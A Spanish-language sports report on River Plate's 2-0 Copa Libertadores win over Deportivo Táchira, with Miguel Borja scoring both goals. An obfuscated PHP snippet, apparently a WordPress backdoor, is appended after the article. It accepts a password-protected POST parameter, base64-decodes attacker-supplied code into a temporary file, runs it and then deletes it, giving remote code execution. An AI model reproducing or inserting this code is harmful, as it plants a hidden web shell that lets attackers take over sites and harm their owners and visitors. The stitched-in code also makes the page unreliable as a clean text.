River Plate ratificó su poderío en el Monumental: venció a Táchira y sacó el mayor puntaje de todos

River Plate derrotó a Deportivo Táchira 2-0, en el estadio Monumental, por la sexta y última fecha del Grupo H de la Copa Libertadores. Así se reencontró con el triunfo tras las derrotas ante Temperley, por la Copa Argentina, y Argentinos Juniors, por el Torneo 2024, y se convirtió en el equipo que más puntos sumó en la fase inicial de esta Libertadores, por lo tanto definirá de local todas las próximas rondas.

Durante el primer tiempo, el equipo de Martín Demichelis desarrolló un amplio dominio y dispuso de varias chances para ponerse en ventaja. Lo evitó la gran tarea del arquero Jesús Camargo -entre otras, se lució tapando dos intentos de Miguel Borja y uno de Pablo Solari- o la falta de puntería.

Esos goles tan buscados y merecidos llegaron en el segundo tiempo, por duplicado a cargo de Miguel Borja, que sigue con su tremenda racha goleadora. A los 5 minutos, Claudio Diablito Echeverri abrió a la derecha con un gran pase a Pablo Solari, quien mandó el centro al medio para que Borja definiese. Una jugada precisa, calculada y efectiva.

Enseguida Jean Gutiérrez, tirándose para rechazar, casi mete un gol en contra y poco después un disparo de Facundo Colidio rozó el travesaño. River Plate seguía siendo muy superior e intentando ampliar la diferencia.

Jean Gutiérrez fue expulsado, a los 26 minutos, por derribar a Miguel Borja cuando se disponía a irse sólo a enfrentar al arquero visitante.

Gran mérito del ingresado Franco Mastantuono, anticipando y robando una pelota, tocando con Agustín Ruberto, otro que entró desde el banco, yendo a buscar la devolución y tirando el centro desde la derecha para que el Colibrí Borja solamente tuviese que empujar con su pie izquierdo, dentro del área chica, le dio al Millonario su segundo festejo de la noche, a los 39 minutos.

River Plate finalizó primero e invicto, acumulando 16 puntos. Segundo quedó Nacional, con 10, y detrás Libertad, con 7, y Deportivo Táchira, con 1.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}